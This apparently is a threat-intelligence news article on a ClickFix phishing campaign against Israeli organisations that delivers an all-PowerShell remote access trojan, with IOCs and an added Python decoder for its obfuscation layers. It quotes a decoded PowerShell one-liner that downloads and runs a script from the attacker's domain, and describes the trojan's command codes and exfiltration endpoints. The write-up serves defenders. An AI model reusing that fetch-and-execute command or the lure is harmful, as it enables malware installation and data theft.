Hackers Exploit ClickFix Technique to Compromise Windows and Run PowerShell Commands

Threat actors have begun a geographically focused campaign against Israeli infrastructure and corporate entities in a sophisticated cyber incursion discovered by Fortinet’s FortiGuard Labs.

Delivered exclusively through Windows systems via PowerShell scripts, the attack chain enables remote access, facilitating data exfiltration, persistent surveillance, and lateral movement within compromised networks.

Classified as high severity, this operation leverages phishing emails disguised as invitations to mentoring sessions on wartime medical supply management, exploiting compromised internal email systems to propagate lures and increase infection rates.

The full attack flow relies on a multi-stage PowerShell-based delivery mechanism, avoiding external executables to evade traditional antivirus detection, with payloads fetched from actor-controlled domains like pharmacynod[.]com.

Attack flow chart

Phishing Campaign Hits Israeli Sectors

The initial access vector begins with phishing emails urging recipients to click embedded links, redirecting them to a spoofed Microsoft Teams interface.

This fake page employs a social engineering tactic known as “ClickFix”: it instructs users to press Windows + R to open the Run dialog, paste a string that the page has already copied to the clipboard, and execute it, which effectively masks the launch of a malicious PowerShell command.

Run dialog box

Embedded in the site’s HTML are three obfuscated Base64-encoded strings that, when decoded, form a command like “powershell IEX ((Invoke-RestMethod -Uri hxxps://pharmacynod[.]com/Fix -Method GET).note.body),” which retrieves and runs a secondary script from the attacker’s server.

This loader downloads files such as test.html, which contain binary-encoded blobs separated by delimiters like “kendrick,” into the victim’s Public Downloads folder.

A follow-up PowerShell script processes these blobs by splitting, converting binary to ASCII characters, and reassembling them into executable code, ultimately deploying a remote access trojan (RAT) entirely in PowerShell.

Obfuscated Payloads

Deeper analysis reveals that the RAT’s loader downloads obfuscated content, including compressed Base64 strings that are decompressed by custom functions for in-memory execution.

For instance, scripts read specific lines from test.html, extract tagged strings, split on delimiters, perform binary-to-character conversions (e.g., “1100110” binary equals decimal 102, mapping to character “f”), and invoke the resulting code with IEX.

This chain culminates in a persistent RAT that hard-codes its command-and-control (C2) server to pharmacynod[.]com, using HTTPS for all communications.

Upon infection, an “init” function gathers victim details like Windows domain, computer name, and username, compresses and reverses them twice with GZip and Base64, then registers via the /16625 endpoint.

The RAT maintains persistence through an infinite polling loop, sleeping for random intervals (2-7 seconds) before POST requests to retrieve commands.

Responses from the C2 are compressed, reversed, and prefixed with codes like 7979 for reinitialization, 5322 for payload downloads via System.Net.WebClient, 4622 for adjusting poll intervals, or 2474 for arbitrary PowerShell execution with output exfiltrated to /17361.

Evasion techniques include layered obfuscation (double GZip compression, Base64 encoding, string reversal, and URL-safe character replacements) combined with native .NET HTTP requests that mimic legitimate traffic by using default credentials, proxies, and a user-agent set via urlmon.dll.
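As an added analyst-side example (not code from the Fortinet report or this article), the following Python decoder handles the two encodings described above: the delimiter-separated binary groups in test.html and the layered GZip / URL-safe Base64 / reversal wrapping of the C2 traffic. The article does not state the exact order of the layers, so the peeler identifies each layer by its content rather than assuming an order; the “kendrick” delimiter and the 7-bit binary groups come from the article, while build_sample is a constructed fixture, not captured traffic.

```python
import base64, gzip, re, string

BLOB_DELIM = "kendrick"          # delimiter named in the write-up
GZIP_MAGIC = b"\x1f\x8b"
B64_CHARS = re.compile(r"^[A-Za-z0-9+/=_-]+$")

def decode_binary_blobs(text: str, delim: str = BLOB_DELIM) -> str:
    """Rebuild text from delimiter-separated binary groups, e.g. '1100110' -> 'f'."""
    return "".join(chr(int(c, 2)) for c in text.split(delim) if c.strip())

def _looks_plain(data: bytes) -> bool:
    # Script text is ASCII-printable and not merely a run of Base64 alphabet characters.
    text = data.decode("ascii", "replace")
    return bool(text) and set(text) <= set(string.printable) and not B64_CHARS.match(text)

def _try_b64(text: str):
    # Undo URL-safe substitutions, restore padding, decode strictly; None if not Base64.
    s = text.replace("-", "+").replace("_", "/")
    try:
        return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
    except ValueError:
        return None

def peel_layers(sample: str, max_layers: int = 8) -> tuple[bytes, list[str]]:
    """Strip reversal / URL-safe Base64 / GZip layers in any order until script text remains."""
    cur, steps = sample.encode(), []
    for _ in range(max_layers):
        if cur.startswith(GZIP_MAGIC):
            cur, steps = gzip.decompress(cur), steps + ["gzip"]
            continue
        if _looks_plain(cur):
            break
        text = cur.decode("ascii", "replace")
        for candidate, label in ((text, "base64"), (text[::-1], "reverse+base64")):
            out = _try_b64(candidate)
            # Keep a decoded layer only if it is GZip, script text or another Base64 layer.
            if out is not None and (out.startswith(GZIP_MAGIC) or _looks_plain(out)
                                    or B64_CHARS.match(out.decode("ascii", "replace"))):
                cur, steps = out, steps + [label]
                break
        else:
            break                    # nothing recognisable left; return what we have
    return cur, steps

def build_sample(payload: str = "Get-Process | Out-String") -> str:
    # Constructed fixture, not captured traffic: two rounds of GZip, URL-safe Base64, reverse.
    data = payload.encode()
    for _ in range(2):
        data = base64.urlsafe_b64encode(gzip.compress(data, mtime=0))[::-1]
    return data.decode()
```

The returned step list doubles as a fingerprint of the wrapping order, which is useful when comparing samples from the same campaign.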

Attribution points to potential overlaps with MuddyWater, a known threat group, due to regional targeting, lateral expansion from compromised environments, and scripting tactics.

However, deviations like avoiding remote management tools and public file hosts, plus the novel all-PowerShell RAT, suggest possible evolution or imitation by another actor.

This campaign underscores the risks of living-off-the-land attacks, with Fortinet protections including antivirus signatures like PowerShell/Agent.PH!tr, endpoint detection via FortiEDR, and network blocking through IPS and DNS filtering to mitigate such threats.

Indicators of Compromise

IOC                                                                 Description
hxxps://pharmacynod[.]com/                                          Hard-coded C2
hxxps://pharmacynod[.]com/16625                                     Victim registration / check-in
hxxps://pharmacynod[.]com/17361                                     Exfiltrated command results
46a76b3c7851f30d68ebc6a5584bc099435b0544d8707fff7a9178f46046708b    SHA256 of PowerShell RAT


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.